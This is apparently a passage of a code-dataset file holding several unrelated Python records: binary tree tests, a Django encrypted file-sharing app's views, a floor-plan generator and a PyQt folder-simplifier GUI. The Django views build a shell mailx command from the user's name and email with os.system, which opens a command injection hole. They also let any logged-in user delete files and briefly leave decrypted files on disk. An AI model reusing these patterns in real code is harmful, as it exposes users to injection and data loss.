sequence of nodes.\n Test that their height is calculated correctly\n \"\"\"\n binary_tree_1 = BinaryTree(5)\n self.assertEqual(binary_tree_1.get_height(), 0)\n\n binary_tree_2 = BinaryTree()\n node_values_2 = [10, 5, 15, 2, 12, 6, 20, 19]\n for val in node_values_2:\n binary_tree_2.add(Node(val))\n self.assertEqual(binary_tree_2.get_height(), 3)\n\n binary_tree_3 = BinaryTree()\n node_values_3 = [14, 7, 12, 11, 10, 6, 9]\n for val in node_values_3:\n binary_tree_3.add(Node(val))\n self.assertEqual(binary_tree_3.get_height(), 5)\n\n def test_call_get_height_of_empty_tree(self):\n \"\"\"\n (negative testing of get_height function)\n Create an empty binary tree and a binary tree with non-integer root value.\n Test that call of get_height method of created binary trees returns None\n \"\"\"\n binary_tree_1 = BinaryTree()\n binary_tree_2 = BinaryTree('non-integer')\n self.assertEqual(binary_tree_1.get_height(), None)\n self.assertEqual(binary_tree_2.get_height(), None)\n\n def test_binary_tree_from_generator_and_get_height(self):\n \"\"\"\n (end-to-end testing of get_height function)\n Create a binary tree with a root.\n Add nodes from generator to the binary tree.\n Test that the height of the binary tree is equal to the generator length\n \"\"\"\n binary_tree = BinaryTree(0)\n for val in range(1, 50):\n binary_tree.add(Node(val))\n self.assertEqual(binary_tree.get_height(), len(range(1, 50)))\n\n def test_get_dfs_of_binary_trees(self):\n \"\"\"\n (positive testing of get_dfs function)\n Create binary trees with different node values and sequence.\n Test that their DFS is traversed correctly\n \"\"\"\n binary_tree_1 = BinaryTree()\n node_values_1 = [6, 5, 11, 12, 2, 7]\n dfs_1 = [6, 5, 2, 11, 7, 12]\n for val in node_values_1:\n binary_tree_1.add(Node(val))\n binary_tree_1.get_dfs()\n self.assertEqual(binary_tree_1.dfs_nodes, dfs_1)\n\n binary_tree_2 = BinaryTree()\n node_values_2 = [14, 7, 12, 11, 10, 6]\n dfs_2 = [14, 7, 6, 12, 11, 10]\n for val in node_values_2:\n binary_tree_2.add(Node(val))\n binary_tree_2.get_dfs()\n self.assertEqual(binary_tree_2.dfs_nodes, dfs_2)\n\n def test_get_dfs_empty_tree(self):\n \"\"\"\n (negative testing of get_dfs function)\n Create an empty binary tree.\n Test that the DFS traversal cannot be implemented\n \"\"\"\n binary_tree = BinaryTree()\n binary_tree.get_dfs()\n self.assertFalse(binary_tree.dfs_nodes)\n\n def test_get_dfs_3(self):\n \"\"\"\n (end-to-end testing of get_dfs function)\n Create an empty binary tree.\n Add the root node to the binary tree.\n Add other nodes to the binary tree.\n Test that the DFS is traversed correctly on different stages\n \"\"\"\n binary_tree = BinaryTree()\n root_value = [15]\n node_values = [14, 13, 17, 25, 8]\n dfs = [15, 14, 13, 8, 17, 25]\n\n binary_tree.add(Node(root_value[0]))\n binary_tree.get_dfs()\n self.assertEqual(binary_tree.dfs_nodes, root_value)\n\n for val in node_values:\n binary_tree.add(Node(val))\n binary_tree.get_dfs()\n self.assertEqual(binary_tree.dfs_nodes, dfs)\n\n binary_tree.add(Node(30))\n dfs.append(30)\n binary_tree.get_dfs()\n self.assertEqual(binary_tree.dfs_nodes, dfs)\n","sub_path":"binarytree/binarytree_test.py","file_name":"binarytree_test.py","file_ext":"py","file_size_in_byte":9545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"193339195","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.generic import ListView, CreateView, DetailView, UpdateView, 
DeleteView, View\nfrom .models import Files, Crypt, Thumb\nfrom django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin\nfrom django.core.paginator import Paginator\nfrom django.contrib.auth.models import User\nfrom .forms import FileAuthForm1, FileAuthForm2, FileAuthForm3\nfrom django.contrib import messages\nfrom django.http import HttpResponse\nfrom Crypto.Cipher import AES\nfrom twilio.rest import Client\nimport hashlib, threading, time\nfrom groups.models import MyGroup\nimport os\n\naccount_sid = \"\"\nauth_token = \"\"\n\nclass ResetView(View):\n\tdef get(self, request, *args, **kwargs):\n\n\t\treturn render(request, 'fileshare/file_reset.html')\n\n\tdef post(self, request, *args, **kwargs):\n\t\tfiles = Files.objects.filter(author = request.user)\n\t\tgroups = MyGroup.objects.filter(creator = request.user)\n\t\tfcount = 0\n\t\tgcount = 0\n\n\t\tfor file in files:\n\t\t\tFiles.delete(file)\n\t\t\tfcount += 1\n\t\tfor group in groups:\n\t\t\tMyGroup.delete(group)\n\t\t\tgcount += 1\n\t\trequest.user.profile.total_owned_files = 0\n\t\trequest.user.profile.total_owned_groups = 0\n\t\trequest.user.profile.total_uploaded_files = 0\n\t\trequest.user.profile.total_download_files = 0\n\t\trequest.user.profile.save()\n\t\tmessages.info(request,f\"A total of {fcount} files were deleted and {gcount} groups were deleted\")\n\t\treturn redirect('fileshare_dashboard')\n\nclass VPN(LoginRequiredMixin, View):\n\tdef get(self, request, *args, **kwargs):\n\t\taddress = request.user.email\n\t\tfile1 = 'UK.ovpn'\n\t\tfile2 = 'Germany.ovpn'\n\t\tphones = 'https://play.google.com/store/apps/details?id=net.openvpn.openvpn'\n\t\tcomp = \"https://openvpn.net/client-connect-vpn-for-windows/\"\n\t\tbody1 = \"{self.request.user} has requested to send the keys to the VPN to this email. \"\n\t\tbody2 = \"If you would like to access the VPN on your smartphone click on this link| {phones} |\"\n\t\tbody3 = \"If you would like to access the VPN on your computer click on this link| {comp} | \"\n\t\tbody4 = \"Use these files to connect to your desired location\"\n\t\tsubject = \"VPN\"\n\t\tos.system(f\"echo '{self.request.user} has requested to send the keys to the VPN to this email. 
If you would like to access the VPN on your smartphone click on this link| {phones} | If you would like to access the VPN on your computer click on this link| {comp} | Use these files to connect to your desired location' | mailx -s {subject} {address} -A {file1} -A {file2}\")\n\t\treturn redirect('fileshare_dashboard')\n\n\ndef has_num(number):\n\tif number == None:\n\t\treturn False\n\telse:\n\t\treturn True\n\ndef blank(request):\n\treturn render(request, 'fileshare/tab.html')\n\ndef dashboard(request):\n\tif request.user.is_authenticated:\n\t\tfiles = Files.objects.filter(author=request.user)\n\t\tgroups = MyGroup.objects.filter(creator=request.user)\n\t\trequest.user.profile.total_groups = len(groups)\n\t\trequest.user.profile.total_owned_files = len(files)\n\t\tspace = 0\n\t\tfor file in files:\n\t\t\tspace += os.path.getsize(file.doc.path)\n\t\trequest.user.profile.space = space \n\n\n\t\trequest.user.profile.save()\n\n\t\tnumber = has_num(request.user.profile.phone)\n\t\tif not number:\n\t\t\tmessages.info(request, f'Please go to profile and update phone number field for text notifications and better security')\n\n\t\tif request.user.is_superuser:\n\t\t\tcontext = {'docs':Files.objects.all()}\n\t\telse:\n\t\t\tcontext = {'docs':Files.objects.all()}\n\t\treturn render(request, 'fileshare/dashboard.html', context)\n\n\treturn render(request, 'users/login.html')\n\ndef recrypt(file, data):\n\ttime.sleep(4)\n\twith open(file, 'wb') as we:\n\t\twe.write(data)\n\treturn\n\ndef read_file(file):\n\tprint(\"WE MADE IT TO READ FILE\")\n\twith open(file, 'rb') as e:\n\t\treturn e.read()\ndef write_file(file, data):\n\twith open(file, 'wb') as df:\n\t\tdf.write(data)\n\treturn\n\ndef send_msg(receiver, message):\n\taccount_sid = \"\"\n\tauth_token = \"\"\n\tclient = Client(account_sid, auth_token)\n\tmsg = client.messages.create(\n\tfrom_ = \"9292012004\",\n\tto = f\"+1{receiver}\",\n\tbody = message\n)\n\nclass FileAuth(View, LoginRequiredMixin):\n\tdef get(self, request, *args, **kwargs):\n\t\tRlink1 = \"fileshare_dashboard\"\n\t\tauth = Files.objects.get(pk=kwargs.get('pk'))\n\t\tnumber = has_num(request.user.profile.phone)\n\t\tif not number:\n\t\t\tmessages.info(request, f'Please go to profile and update phone number field for text notifications and better security')\n\t\tif auth.encryption == Files.OPT1:\n\t\t\tpform = FileAuthForm1()\n\t\telif auth.encryption == Files.OPT2:\n\t\t\tpform = FileAuthForm2()\n\t\telif auth.encryption == Files.OPT3:\n\t\t\tpform = FileAuthForm3()\n\t\telse:\n\t\t\tmessages.success(request, f'This form is not encrypted')\n\t\t\tpform = FileAuthForm2()\n\n\t\tcontext = {'pform':pform}\n\t\treturn render(request, 'fileshare/file_auth.html', context)\n\n\tdef post(self, request, *args, **kwargs):\n\t\tRlink1 = \"fileshare_dashboard\"\n\t\tmode = AES.MODE_CFB\n\t\tauth = Files.objects.get(pk=kwargs.get('pk'))\n\t\tnumber = has_num(request.user.profile.phone)\n\t\tif not number:\n\t\t\tmessages.info(request, f'Please go to profile and update phone number field for text notifications and better security')\n\t\tif auth.encryption == Files.OPT1:\n\t\t\tif request.POST['pin'] == auth.pin and auth.author.ivk.iv == request.user.ivk.iv:\n\t\t\t\tmessages.success(request, f'AUTHENTICATED. 
The file will lock itself after 4 SECONDS')\n\t\t\t\trequest.user.profile.total_download_files += 1\n\t\t\t\trequest.user.profile.save()\n\t\t\t\tif number:\n\t\t\t\t\tmsg = f\"User {request.user} has accessed file {str(auth.doc)[6:]} labeled {auth.title}\"\n\n\t\t\t\tE_F = \"\"\n\t\t\t\tD_F = \"\"\n\t\t\t\tkey = hashlib.sha256(auth.pin.encode(\"utf8\")).digest()\n\t\t\t\tiv = auth.author.ivk.iv[:16].encode(\"utf8\")\n\t\t\t\tcipher = AES.new(key, mode, iv)\n\n\t\t\t\tE_F = read_file(auth.doc.path)\n\t\t\t\tD_F = cipher.decrypt(E_F)\n\t\t\t\twrite_file(auth.doc.path, D_F)\n\n\t\t\t\tRR = threading.Thread(target = recrypt, args = [auth.doc.path, E_F])\n\t\t\t\tRR.start()\n\t\t\t\treturn render(request, 'fileshare/file_view.html', {'item':auth})\n\n\t\t\telse:\n\t\t\t\tmessages.success(request, f'NOT AUTHENTICATED')\n\t\t\t\tif request.user != auth.author:\n\t\t\t\t\tmessages.error(request, 'File encrypted using IVK which is unique for each account')\n\t\t\treturn redirect(Rlink1)\n\n\n\t\telif auth.encryption == Files.OPT2:\n\t\t\tif request.user.ivk.iv == auth.author.ivk.iv:\n\t\t\t\tmessages.success(request, f'AUTHENTICATED. The file will lock itself after 4 SECONDS')\n\t\t\t\trequest.user.profile.total_download_files += 1\n\t\t\t\trequest.user.profile.save()\n\t\t\t\tif number:\n\t\t\t\t\tmsg = f\"User {request.user} has accessed file {str(auth.doc)[6:]} labeled {auth.title}\"\n\t\t\t\t\t#send_msg(request.user.profile.phone, msg)\n\n\t\t\t\tkey = hashlib.sha256(request.user.ivk.iv[:16].encode(\"utf8\")).digest()\n\t\t\t\tcipher = AES.new(key, mode, auth.author.ivk.iv[:16].encode(\"utf8\"))\n\t\t\t\tE_F = read_file(auth.doc.path)\n\t\t\t\tD_F = cipher.decrypt(E_F)\n\t\t\t\twrite_file(auth.doc.path, D_F)\n\t\t\t\tRR = threading.Thread(target = recrypt, args = [auth.doc.path, E_F])\n\t\t\t\tRR.start()\n\t\t\t\treturn render(request, 'fileshare/file_view.html', {'item':auth})\n\n\t\t\telse:\n\t\t\t\tmessages.success(request, f'NOT AUTHENTICATED')\n\t\t\treturn redirect(Rlink1)\n\n\n\t\telif auth.encryption == Files.OPT3:\n\t\t\tif request.POST['pin'] == auth.pin:\n\t\t\t\tmessages.success(request, f'AUTHENTICATED. 
The file will lock itself after 4 SECONDS')\n\t\t\t\trequest.user.profile.total_download_files += 1\n\t\t\t\trequest.user.profile.save()\n\t\t\t\tif number:\n\t\t\t\t\tmsg = f\"User {request.user} has accessed file {str(auth.doc)[6:]} labeled {auth.title}\"\n\t\t\t\tkey = hashlib.sha256(auth.pin.encode(\"utf8\")).digest()\n\t\t\t\tcipher = AES.new(key, mode, Files.piv(auth).encode(\"utf8\"))\n\t\t\t\tE_F = read_file(auth.doc.path)\n\t\t\t\tD_F = cipher.decrypt(E_F)\n\t\t\t\twrite_file(auth.doc.path, D_F)\n\t\t\t\tRR = threading.Thread(target = recrypt, args = [auth.doc.path, E_F])\n\t\t\t\tRR.start()\n\t\t\t\treturn render(request, 'fileshare/file_view.html', {'item':auth})\n\n\t\t\telse:\n\t\t\t\tmessages.success(request, f'NOT AUTHENTICATED')\n\t\t\treturn redirect(Rlink1)\n\n\n\t\telse:\n\t\t\tmessages.success(request, f'NO AUTHENTICATION REQUIRED')\n\t\t\trequest.user.profile.total_download_files += 1\n\t\t\trequest.user.profile.save()\n\t\t\tif number:\n\t\t\t\tmsg = f\"User {request.user} has accessed file {str(auth.doc)[6:]} labeled {auth.title}\"\n\t\t\treturn render(request, 'fileshare/file_view.html', {'item':auth})\n\nclass PostListView(LoginRequiredMixin, View):\n\tpaginate_by = 100\n\tdef get(self, request, *args, **kwargs):\n\t\tfiles = Files.objects.all()\n\t\towned_files = []\n\t\towned_groups = []\n\t\ttotal_groups = 0\n\t\tpart_of = []\n\t\tcan_remove = [] #27\n\t\tcan_view = [] #28\n\t\tgroup = MyGroup.objects.all()\n\t\tcontext = {}\n\t\ttotal_files = 0\n\t\ttotal_given_files = 0\n\t\tgiven_files = []\n\n\n\t\tfor item in group: # check groups\n\t\t\tif item.creator != request.user: # Group not created by you\n\t\t\t\tfor user in item.user_set.all(): # Checking users in group\n\t\t\t\t\tif user == request.user: # If you in a group that you did not create\n\t\t\t\t\t\ttotal_groups += 1\n\t\t\t\t\t\tif item.permissions.all(): # Group has permissions\n\t\t\t\t\t\t\tfor perm in item.permissions.all(): # For every Permission\n\t\t\t\t\t\t\t\tif perm.id == 27: # if its delete\n\t\t\t\t\t\t\t\t\tfor file in item.files_set.all(): # Checking files in that group with that permission\n\t\t\t\t\t\t\t\t\t\tif not (file in can_remove): # Duplication check\n\t\t\t\t\t\t\t\t\t\t\tcan_remove.append(file) # Files you can delete\n\t\t\t\t\t\t\t\telif perm.id == 28: # If its view\n\t\t\t\t\t\t\t\t\tfor file in item.files_set.all(): # Checking files in that group with that permission\n\t\t\t\t\t\t\t\t\t\tif not (file in can_view): # Duplication check\n\t\t\t\t\t\t\t\t\t\t\tcan_view.append(file) # Files you can view\n\t\t\t\t\t\telse: # Group has no permissions no permissions\n\t\t\t\t\t\t\tfor file in item.files_set.all():\n\t\t\t\t\t\t\t\tif not (file in given_files): # Duplication check\n\t\t\t\t\t\t\t\t\tgiven_files.append(file) # Files you can view\n\t\t\telse:\n\t\t\t\towned_groups.append(item)\n\n\t\tfor i in can_remove:\n\t\t\tgiven_files.append(i)\n\n\t\tfor i in can_view:\n\t\t\tgiven_files.append(i)\n\n\t\tfor item in files:\n\t\t\tif item.author == request.user:\n\t\t\t\towned_files.append(item)\n\n\t\tfor c1 in owned_files:\n\t\t\ttotal_files +=1\n\n\t\tfor c2 in given_files:\n\t\t\ttotal_given_files += 1\n\n\t\tfor c3 in owned_groups:\n\t\t\ttotal_groups += 1\n\n\n\t\trequest.user.profile.total_given_files = total_given_files\n\t\trequest.user.profile.save()\n\n\t\tcontext = {'files':files, 'owned_files':owned_files, 'total_given_files':total_given_files, 'total_files':total_files, 'can_remove':can_remove, 'can_view':can_view, 'owned_groups':owned_groups, 
'given_files':given_files}\n\t\tfor item in files:\n\n\t\t\tif item.encryption == 'None':\n\t\t\t\titem.thumbnail = Thumb.thumb(item.doc)\n\t\t\telse:\n\t\t\t\titem.thumbnail = 'locked.jpg'\n\n\t\treturn render(request, 'fileshare/file_home.html', context)\n\n\tdef post(self, request, *args, **kwargs):\n\t\tpass\n\n\nclass PostCreateView(LoginRequiredMixin, CreateView):\n\tmodel = Files\n\ttemplate_name = 'fileshare/new_file.html'\n\tfields = ['title', 'doc', 'encryption', 'pin']\n\tsuccess_url = '/files'\n\n\tdef form_valid(self, form):\n\t\tform.instance.author = self.request.user\n\t\tself.request.user.profile.total_uploaded_files += 1\n\t\tself.request.user.profile.save()\n\t\treturn super().form_valid(form)\n\nclass PostUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):\n\tmodel = Files\n\tfields = ['title', 'doc']\n\ttemplate_name = 'fileshare/file_update.html'\n\n\tdef test_func(self):\n\t\tpost = self.get_object()\n\t\tif self.request.user == post.author:\n\t\t\treturn True\n\t\treturn False\n\nclass PostDeleteView(LoginRequiredMixin, DeleteView):\n\tmodel = Files\n\ttemplate_name = 'fileshare/file_delete.html'\n\tsuccess_url = '/files'\n\n\tdef test_func(self):\n\t\tpost = self.get_object()\n\t\tif self.request.user == post.author:\n\t\t\treturn True\n\t\treturn False\n","sub_path":"finalcap/fileshare/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"570070285","text":"# Welcome to floormaker, the ultimate resolution to all your floor making needs, enjoy\n# This bad boy builds a floor of a garage\ndef floorMkr(row,col):\n floorNum=1\n columnHeader=\"\"\n colCount=1\n for i in range(col):\n columnHeader+=\"| Column \"+str(colCount)+\" \"\n colCount+=1\n columnHeader+=\"|\"\n border=\"----------------------------------------------------------------------------------------------------------------------------\"\n print(border)\n print(\"Floor \",floorNum)\n print(border)\n print(columnHeader)\n print(border)\n # variable floor houses the matrix used to generate and populate the floor plan with cartesian coordinates\n floor=[]\n # below are the 4 counters used to manage the population of matrix 'floor' with cartesian coordinates\n # this here if statement determines if the requested floor plan is of valid dimensions, row and column counts must both be 'odd'\n if row>2 and col>2 and row%2==1 and col%2==1:\n # the outer loop populates the rows of the matrix and resets row and column counters\n y=(col+1)//2 # y coordinate val\n for i in range(col):\n floor.append([])\n xs=0 # if xs is 0 x values will decrease, if xs is 1 x values will increase\n ys=0 # if ys is 0 y values will decrease, if ys is 1 y values will increase\n # initial values are (x : The bounds of 'floor' domain, y : The bounds of 'floor range, v : row tracker, w : column tracker \n if ys==0:\n y-=1\n else:\n y+=1\n if y==0:\n ys==1\n x=(row-1)//2 # x coordinate val\n # the inner loop populates the columns of the matrix\n for j in range(row):\n if xs==0:\n floor[i].append([(-x,y,0,0,0)])\n else:\n floor[i].append([(x,y,0,0,0)])\n if xs==0:\n x-=1\n else:\n x+=1\n if x==0:\n xs=1\n #x\n #y\n #if \n #v\n #w\n print(floor[i])\n print(border)\n return floor\n else:\n print(\"Your arrays must both contain 3 or more items and contain an odd number of 
items\")\n\n#floorMkr(3,3)\n#print('__________________________________')\n#floorMkr(7,5)\n#print('__________________________________')\nfloorMkr(5,5)\n\n\n","sub_path":"floorMaker.py","file_name":"floorMaker.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"197945313","text":"import sys\nimport os\nimport time\nimport math\nfrom PyQt5.QtWidgets import QWidget, QToolTip, QPushButton, QMainWindow, QApplication, QMessageBox, QDesktopWidget, \\\n QFileDialog, QSlider, QAbstractSlider, QLineEdit, QGridLayout, QLabel, QTreeView, QFileSystemModel, QTreeWidget, \\\n QTreeWidgetItem, QAbstractItemView, QHeaderView, QHBoxLayout, QVBoxLayout\nfrom PyQt5.QtCore import Qt, QThread, pyqtSignal\nfrom PyQt5.QtGui import QFont, QIcon, QMovie, QStandardItemModel, QStandardItem\nfrom copy import deepcopy\nfrom compress_and_prune_v4_1 import read_and_count, simplify_tree, print_tree\n\n\n# BUG ALERT\n# BUG: simplify_tree crashes if all folders do not contain a single file due to dir_dict being empty\n# OPTIMIZATION\n# OPT: Bulk of processing time is from read_and_count, while simplify_tree is quick\n# Instead of current simplifyStructure where read_and_count is called constantly, only call read_and_count\n# when folder is changed.\nclass ZoomerMainWindow(QMainWindow):\n\n def __init__(self, parent=None):\n super(ZoomerMainWindow, self).__init__(parent)\n self.zoomer_widget = ZoomerWidget(self)\n self.setCentralWidget(self.zoomer_widget)\n self.initUI()\n\n def initUI(self):\n QToolTip.setFont(QFont('SansSerif', 10))\n self.statusBar().showMessage('Status message goes here.')\n self.setToolTip('GIMZoomer: File structure simplication program.')\n # self.setGeometry(300, 300, 300, 200)\n self.resize(640, 480)\n self.center()\n\n self.setWindowTitle('GIMZoomer')\n self.setWindowIcon(QIcon('web.png'))\n self.show()\n\n def center(self):\n qr = self.frameGeometry()\n cp = QDesktopWidget().availableGeometry().center()\n qr.moveCenter(cp)\n self.move(qr.topLeft())\n\n\nclass SimplifyThread(QThread):\n started = pyqtSignal()\n finished = pyqtSignal(dict)\n\n def __init__(self, root_path, dir_dict, prune_thold):\n QThread.__init__(self)\n self.root_path = root_path\n self.dir_dict = dir_dict\n self.prune_thold = prune_thold\n\n def __del__(self):\n self.wait()\n\n def run(self):\n self.started.emit()\n dir_dict = simplify_tree(self.root_path, 1, self.dir_dict, 0.95, self.prune_thold, print_=False)\n self.finished.emit(dir_dict)\n\n\nclass ZoomerWidget(QWidget):\n\n def __init__(self, parent=None):\n # super().__init__()\n # self.initUI()\n super(ZoomerWidget, self).__init__(parent)\n self.parent = parent\n self.initUI()\n\n def initUI(self):\n self.setWindowTitle('GIMZoomer')\n # self.prune_thold = 95 # only use when slider scroll direction is reversed\n self.prune_thold = 4\n # self.root_path = os.path.expanduser('~')\n self.root_path = os.path.expanduser('C:\\\\Users\\\\ultra\\\\Dropbox\\\\mcgill')\n # self.root_path = os.path.expanduser('C:\\\\Users\\\\ultra\\\\Documents')\n\n # grid = QGridLayout()\n # grid.setSpacing(10)\n # grid.setColumnStretch(3, 8)\n\n # self.proc_lbl = QLabel()\n # self.proc_lbl.setAlignment(Qt.AlignCenter)\n # self.proc_mov = QMovie('ajax-loader.gif')\n # self.proc_lbl.setMovie(self.proc_mov)\n # # self.proc_lbl.setText('placeholder')\n # # self.proc_mov.start()\n\n select_btn = QPushButton('Select Folder', self)\n select_btn.setToolTip('Select root folder to simplify.')\n 
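# Qt signal/slot wiring: the button's clicked signal calls showFileDialog,\n        # which re-roots the directory scan at whatever folder the user picks.\n        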
select_btn.clicked.connect(self.showFileDialog)\n select_btn.resize(select_btn.sizeHint())\n # grid.addWidget(select_btn, 0, 0)\n\n # self.folder_edit = QLineEdit()\n # self.folder_edit.setReadOnly(True)\n self.folder_edit = QLabel()\n self.folder_edit.setText(self.root_path)\n # grid.addWidget(self.folder_edit, 0, 1)\n\n self.status_label = QLabel()\n self.status_label.setText('')\n\n self.slider_label_top = QLabel()\n self.slider_label_top.setAlignment(Qt.AlignCenter)\n # self.slider_label_top.setText('Pruning\\nThreshold:\\n' + '{:.3f}'.format(self.scalePruning(self.prune_thold)))\n self.slider_label_top.setText('Few important folders')\n # grid.addWidget(self.slider_label_top, 1, 0)\n\n self.slider_label_btm = QLabel()\n self.slider_label_btm.setAlignment(Qt.AlignCenter)\n self.slider_label_btm.setText('All folders')\n\n slider = QSlider(Qt.Vertical, self) # for dynamically changing pruning threshold, default is 0.02\n slider.setValue(self.prune_thold)\n # grid.addWidget(slider, 2, 4, 1, 5)\n slider.setTickPosition(QSlider.TicksBothSides)\n slider.setTickInterval(10)\n slider.valueChanged[int].connect(self.changeValue)\n # slider.setInvertedAppearance(True)\n\n ogtree_label = QLabel()\n ogtree_label.setAlignment(Qt.AlignCenter)\n ogtree_label.setText('Original Structure')\n\n tree_label = QLabel()\n tree_label.setAlignment(Qt.AlignCenter)\n tree_label.setText('Pruned Structure\\n(Ordered by Folder Importance)')\n\n self.ogtree = QTreeView(self)\n self.ogtree.setEditTriggers(QAbstractItemView.NoEditTriggers)\n self.ogmodel = QStandardItemModel()\n self.ogmodel.setHorizontalHeaderLabels(['Folder Name', 'Accessible Files', 'Number of Files'])\n # self.ogtree.header().setSectionResizeMode(QHeaderView.ResizeToContents)\n\n self.tree = QTreeView(self)\n self.tree.setEditTriggers(QAbstractItemView.NoEditTriggers)\n self.model = QStandardItemModel()\n self.model.setHorizontalHeaderLabels(['Folder Name', 'Accessible Files', 'Number of Files'])\n # self.tree.header().setSectionResizeMode(QHeaderView.ResizeToContents)\n\n self.dir_dict, self.og_dir_dict = self.buildStructure(self.root_path)\n self.simplifyStructure(self.root_path, self.dir_dict, self.prune_thold)\n\n grid = QGridLayout()\n grid.addWidget(select_btn, 0, 0, 1, 1)\n grid.addWidget(self.folder_edit, 0, 1, 1, 7)\n grid.addWidget(self.status_label, 0, 8, 1, 1)\n grid.addWidget(ogtree_label, 1, 0, 1, 4)\n grid.addWidget(self.slider_label_top, 1, 4, 1, 1)\n grid.addWidget(tree_label, 1, 5, 1, 4)\n grid.addWidget(self.ogtree, 2, 0, 1, 4)\n grid.addWidget(slider, 2, 4, 1, 1, alignment=Qt.AlignHCenter)\n grid.addWidget(self.tree, 2, 5, 1, 4)\n grid.addWidget(self.slider_label_btm, 3, 4, 1, 1)\n\n self.setLayout(grid)\n # self.resize(640, 480)\n # self.show()\n\n def scalePruning(self, prune_thold):\n # # for reversing the slider scroll direction\n # scale_dict = dict(zip(range(100), range(100)[::-1]))\n # return scale_dict[prune_thold] * 0.005\n return prune_thold * 0.005\n # return math.log(prune_thold, 10)/2\n # return math.exp(prune_thold)/math.exp(100)\n\n def showFileDialog(self):\n dirpath = QFileDialog.getExistingDirectory(self, 'Select Folder', self.root_path)\n if dirpath:\n self.root_path = os.path.abspath(dirpath)\n self.folder_edit.setText(self.root_path)\n self.dir_dict, self.og_dir_dict = self.buildStructure(self.root_path)\n self.simplifyStructure(self.root_path, self.dir_dict, self.prune_thold)\n\n def changeValue(self, value):\n # print(value)\n self.prune_thold = value\n # 
self.slider_label.setText('Pruning\\nThreshold:\\n' + '{:.3f}'.format(self.scalePruning(self.prune_thold)))\n self.dir_dict = deepcopy(self.og_dir_dict)\n self.simplifyStructure(self.root_path, self.dir_dict, self.prune_thold)\n\n def buildStructure(self, root_path):\n dir_dict = read_and_count(root_path)\n og_dir_dict = deepcopy(dir_dict)\n self.refreshTreeView(self.ogmodel, self.ogtree, og_dir_dict)\n return og_dir_dict, dir_dict\n\n def simplifyStructure(self, root_path, dir_dict, prune_thold):\n def simplify_started():\n self.status_label.setText('Please wait...')\n self.parent.statusBar().showMessage('Hello World')\n\n def simplify_finished(returned_dict):\n self.refreshTreeView(self.model, self.tree, returned_dict)\n self.status_label.setText('')\n self.parent.statusBar().showMessage('Goodbye World')\n\n # [0] directory name, [1] parent key, [2] children keys,\n # [3] names of files found in directory, [4] cumulative count of accessible files\n # root_path = 'C:\\\\Users\\\\ultra\\\\Dropbox\\\\mcgill'\n # dir_dict = read_and_count(root_path)\n # og_dir_dict = deepcopy(dir_dict)\n # dir_dict = simplify_tree(root_path, 1, dir_dict, 0.95, self.scalePruning(prune_thold), print_=False)\n # self.status_label.setText('Please wait...')\n # self.parent.statusBar().showMessage('Hello World')\n simplify_worker = SimplifyThread(root_path, dir_dict, self.scalePruning(prune_thold))\n simplify_worker.started.connect(simplify_started)\n simplify_worker.finished.connect(simplify_finished)\n simplify_worker.start()\n # print_tree(root_path, dir_dict)\n\n # self.refreshTreeView(self.model, self.tree, dir_dict)\n\n # # self.ogmodel.clear()\n # # self.ogmodel.setHorizontalHeaderLabels(['Folder Name', 'Accessible Files', 'Number of Files'])\n # self.ogmodel.removeRow(0)\n # ogparent = self.ogmodel.invisibleRootItem()\n # self.append_all_children(1, og_dir_dict, ogparent) # dir_dict key starts at 1 since 0==False\n # self.ogtree.setModel(self.ogmodel)\n # self.ogtree.expandAll()\n # self.ogtree.resizeColumnToContents(0)\n # self.ogtree.resizeColumnToContents(1)\n # self.ogtree.resizeColumnToContents(2)\n\n # # self.model.clear()\n # # self.model.setHorizontalHeaderLabels(['Folder Name', 'Accessible Files', 'Number of Files'])\n # self.model.removeRow(0)\n # parent = self.model.invisibleRootItem()\n # self.append_all_children(1, dir_dict, parent) # dir_dict key starts at 1 since 0==False\n # self.tree.setModel(self.model)\n # self.tree.expandAll()\n # self.tree.resizeColumnToContents(0)\n # self.tree.resizeColumnToContents(1)\n # self.tree.resizeColumnToContents(2)\n\n # return dir_dict, og_dir_dict\n\n def refreshTreeView(self, model, tree, dir_dict):\n model.removeRow(0)\n parent = model.invisibleRootItem()\n self.append_all_children(1, dir_dict, parent) # dir_dict key starts at 1 since 0==False\n tree.setModel(model)\n # tree.expandAll()\n tree.expandToDepth(0)\n tree.resizeColumnToContents(0)\n tree.resizeColumnToContents(1)\n tree.resizeColumnToContents(2)\n\n def append_all_children(self, dirkey, dir_dict, qitem):\n qitem.appendRow([QStandardItem(dir_dict[dirkey][0]),\n QStandardItem(str(dir_dict[dirkey][4])),\n QStandardItem(str(len(dir_dict[dirkey][3])))])\n current_row = qitem.rowCount()-1\n # for child in sorted(dir_dict[dirkey][2]):\n # self.append_all_children(child, dir_dict, qitem.child(current_row))\n children_keys = dir_dict[dirkey][2]\n children_names = [dir_dict[child][0].lower() for child in children_keys]\n for child_name, child_key in sorted(zip(children_names, children_keys)):\n 
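# Sorting (lowercased name, key) pairs recurses into the children in\n            # case-insensitive alphabetical order, so sibling folders render stably.\n            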
self.append_all_children(child_key, dir_dict, qitem.child(current_row))\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n zmw = ZoomerMainWindow()\n # zw = ZoomerWidget()\n zmw.show()\n sys.exit(app.exec_())\n","sub_path":"archive/zoom_interface_v3_1.py","file_name":"zoom_interface_v3_1.py","file_ext":"py","file_size_in_byte":11651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"190652266","text":"from .lifelines import Lifelines\nfrom .fragments import Fragments\n\nfrom .excepts import EmptyOptionalFragment\n\n\nclass SequenceDiagrams():\n\n def __init__(self):\n self.sequence_diagrams = []\n self.lifelines = []\n self.fragments = []\n\n def create_and_persist_lifelines(self, lifeline_name):\n lifeline = Lifelines(lifeline_name)\n self.lifelines.append(lifeline)\n\n def create_and_persist_fragments(\n self, fragment_name, fragment_represented\n ):\n\n if self.sequence_diagram_exists(fragment_represented) is True:\n fragment = Fragments(fragment_name, fragment_represented)\n self.fragments.append(fragment)\n\n else:\n raise 